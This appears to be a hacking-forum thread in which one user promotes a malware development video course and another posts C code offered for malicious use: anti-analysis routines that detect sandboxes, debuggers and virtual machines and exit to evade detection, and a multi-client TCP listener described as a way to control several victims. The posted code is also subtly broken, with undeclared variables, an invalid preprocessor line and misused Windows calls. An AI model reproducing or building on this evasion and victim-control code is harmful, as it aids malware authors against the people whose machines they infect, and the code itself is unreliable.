Unlock the Secrets of Malware Development: Comprehensive Course

blc_chef · February 8, 2024, 10:21pm

Hi my fellow members am proud to tell that the promised malware development course is out now,
its 5 hours straight and it begins with the basics to advanced staff and this is part 1
it’s the biggest malware development on the internet
The link to the channel

Admins, IT personnel, malware developers, hackers please am kindly requesting for your support, i need to reach 1000 subscribers but i cant do it without you guys, am doing everything and have done everything because of your support so please support me by going to my channel and subscribe
BECAUSE WE ARE A COMMUNITY OF SUPPORTIVE INDIVIDUALS SO PLEASE SUPPORT YOUR OWN.
Hackers its your time to support me

Subscribe, share and like just that
Subscribe please to make the channel grow

squeaky_pancakes · February 12, 2024, 5:15pm

Very nice! Thank you so much for sharing.

blc_chef · February 13, 2024, 8:32pm

welcome my friend and am dropping more

VashDUHstampede · February 17, 2024, 4:47am

If you can get people to watch your videos at a faster speed then you get double the views… im explaining wrong but look it up please ill try it watching it at a faster speed

blc_chef · February 20, 2024, 7:50pm

okay bro let mi try it out thanks alot

VashDUHstampede · February 20, 2024, 11:35pm

I hope it worked and im watching your videos at a higher speed so i hope it gets your more views

blc_chef · February 22, 2024, 7:26pm

thanks my friend so apart from dat what else should improve

E1.Coders · March 2, 2024, 10:03am

This is a sample code that I wrote to increase the rate of non-recognition of my file

# © Code By E1.Coders
#include <windows.h>
#include <winreg.h>
#include <stdio.h>

bool is_sandboxed() {
    HDEVINFO hDeviceInfo = SetupDiGetClassDevs(&GUID_DEVCLASS_DISKDRIVE, NULL, NULL, DIGCF_PRESENT | DIGCF_DEVICEINTERFACE);
    if (hDeviceInfo == INVALID_HANDLE_VALUE) {
        return false;
    }

    SP_DEVICE_INTERFACE_DATA deviceInterfaceData;
    deviceInterfaceData.cbSize = sizeof(SP_DEVICE_INTERFACE_DATA);

    for (int i = 0; SetupDiEnumDeviceInterfaces(hDeviceInfo, NULL, &GUID_DEVCLASS_DISKDRIVE, i, &deviceInterfaceData); i++) {
        DWORD dwRegKeySize = 0;
        SetupDiGetDeviceRegistryProperty(hDeviceInfo, &deviceInterfaceData, SPDRP_REGISTRYKEY, NULL, NULL, 0, &dwRegKeySize);

        if (dwRegKeySize > 0) {
            wchar_t* pDeviceRegistryKey = (wchar_t*)malloc(dwRegKeySize);
            SetupDiGetDeviceRegistryProperty(hDeviceInfo, &deviceInterfaceData, SPDRP_REGISTRYKEY, NULL, (PBYTE)pDeviceRegistryKey, dwRegKeySize, NULL);

            HKEY hKey;
            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, pDeviceRegistryKey, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
                wchar_t path[MAX_PATH];
                if (RegQueryValueExW(hKey, L"Parent", NULL, NULL, (LPBYTE)path, NULL) == ERROR_SUCCESS) {
                    if (_wcsstr(path, L"VMWare") || _wcsstr(path, L"VirtualBox")) {
                        free(pDeviceRegistryKey);
                        RegCloseKey(hKey);
                        SetupDiDestroyDeviceInfoList(hDeviceInfo);
                        return true;
                    }
                }

                RegCloseKey(hKey);
            }

            free(pDeviceRegistryKey);
        }
    }

    SetupDiDestroyDeviceInfoList(hDeviceInfo);
    return false;
}

bool is_debugger_present() {
    return IsDebuggerPresent();
}

bool is_virtualized() {
    bool is_virtualized = false;

    // Check for virtualized CPUID function
    __try {
        __asm {
            mov eax, 0x80000001
            cpuid
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        is_virtualized = true;
    }

    // Check for hypervisor-specific indicators
    HKEY hKey;
    if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        wchar_t vendor[0x40];
        DWORD size = sizeof(vendor);
        RegQueryValueExW(hKey, L"VendorIdentifier", NULL, NULL, (LPBYTE)vendor, &size);

        if (_wcsstr(vendor, L"VMware") || _wcsstr(vendor, L"VirtualBox") || _wcsstr(vendor, L"QEMU")) {
            is_virtualized = true;
        }

        RegCloseKey(hKey);
    }

    return is_virtualized;
}

int main() {
    if (is_sandboxed() || is_debugger_present() || is_virtualized()) {
        // Prevent analysis by exiting
        exit(0);
    }

    // Rest of the code
    return 0;
}

Lix · March 15, 2024, 12:06pm

Hi guys I am a new one here, and I am really interested in learning hacking, is there anyone willing to teach me this cool skill? I know how to program C++ (not super advanced though), and i do understand the basics of binary.

E1.Coders · May 24, 2024, 11:05pm

This code creates a TCP socket server that can communicate with multiple clients simultaneously. An efficient method to simultaneously control several victims…

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <errno.h>
#CODE BY E1.Coders
#define PORT 8888
#define CLIENTS 5

int main() {
    int server_fd, new_socket, client_socket[CLIENTS], activity, i, valread, sd;
    int max_sd;
    struct sockaddr_in address;
    char buffer[1025];
    fd_set readfds;

    char *message = "ECHO Daemon v1.0 \r\n";
    for (i = 0; i < CLIENTS; i++) {
        client_socket[i] = 0;
    }
    if ((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == 0) {
        perror("socket failed");
        exit(EXIT_FAILURE);
    }
    fcntl(server_fd, F_SETFL, O_NONBLOCK);
    address.sin_family = AF_INET;
    address.sin_addr.s_addr = INADDR_ANY;
    address.sin_port = htons(PORT);
    if (bind(server_fd, (struct sockaddr *)&address, sizeof(address)) < 0) {
        perror("bind failed");
        exit(EXIT_FAILURE);
    }
    printf("Listener on port %d \n", PORT);
    if (listen(server_fd, 3) < 0) {
        perror("listen");
        exit(EXIT_FAILURE);
    }
    while (TRUE) {
        FD_ZERO(&readfds);
        FD_SET(server_fd, &readfds);
        max_sd = server_fd;
        for (i = 0; i < CLIENTS; i++) {
            sd = client_socket[i];
            if (sd > 0)
                FD_SET(sd, &readfds);
            if (sd > max_sd)
                max_sd = sd;
        }
        activity = select(max_sd + 1, &readfds, NULL, NULL, NULL);
        if ((activity < 0) && (errno != EINTR)) {
            printf("select error");
        }
        if (FD_ISSET(server_fd, &readfds)) {
            if ((new_socket = accept(server_fd, (struct sockaddr *)&address, (socklen_t *)&addrlen)) < 0) {
                perror("accept");
                exit(EXIT_FAILURE);
            }
            if (send(new_socket, message, strlen(message), 0) != strlen(message)) {
                perror("send");
            }
            puts("Welcome message sent successfully");
            for (i = 0; i < CLIENTS; i++) {
                if (client_socket[i] == 0) {
                    client_socket[i] = new_socket;
                    printf("Adding to list of sockets as %d\n", i);

                    break;
                }
            }
        }        for (i = 0; i < CLIENTS; i++) {
            sd = client_socket[i];

            if (FD_ISSET(sd, &readfds)) {
                if ((valread = read(sd, buffer, 1024)) == 0) {
                    getpeername(sd, (struct sockaddr *)&address, (socklen_t *)&addrlen);
                    printf("Host disconnected, ip %s, port %d \n", inet_ntoa(address.sin_addr), ntohs(address.sin_port));

                    close(sd);
                    client_socket[i] = 0;
                }
                else {
                    buffer[valread] = '\0';
                    send(sd, buffer, strlen(buffer), 0);
                }
            }
        }
    }

    return 0;
}

system · June 9, 2024, 2:22pm

This topic was automatically closed after 121 days. New replies are no longer allowed.